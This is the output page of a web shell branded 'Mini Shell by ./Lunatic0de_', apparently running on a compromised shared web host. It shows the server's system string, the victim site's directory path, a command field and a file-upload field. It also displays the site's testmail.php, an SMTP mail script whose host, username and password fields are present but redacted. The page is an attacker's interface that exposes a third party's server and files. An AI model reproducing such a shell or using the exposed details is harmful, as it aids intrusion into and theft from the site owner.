MINI SHELL BY ./Lunatic0de_


  
SYSTEM: Linux sg2nlhg026.shr.prod.sin2.secureserver.net 2.6.32-604.30.3.lve1.3.63.el6.nfsfixes.x86_64 #1 SMP Mon Oct 26 11:56:49 MST 2015 x86_64
cmd: 

Directory : /home/content/12/10898412/html/pitujjain/
Upload File :
Current File : /home/content/12/10898412/html/pitujjain/testmail.php

";
 $to = "Geek4Support Recipient ";
 $subject = "Hi!";
 $body = "Hi,\n\nHow are you?";
 
 $host = "mail.pitujjain.in";
 $username = "[email protected]";
 $password = "[email protected]";
 
 $headers = array ('From' => $from,
   'To' => $to,
   'Subject' => $subject);
 $smtp = Mail::factory('smtp',
   array ('host' => $host,
     'auth' => true,
     'username' => $username,
     'password' => $password));
 
 $mail = $smtp->send($to, $headers, $body);
 
 if (PEAR::isError($mail)) {
   echo("

" . $mail->getMessage() . "

"); } else { echo("

Message successfully sent!

"); } ?>

Mini shell by ./Lunatic0de_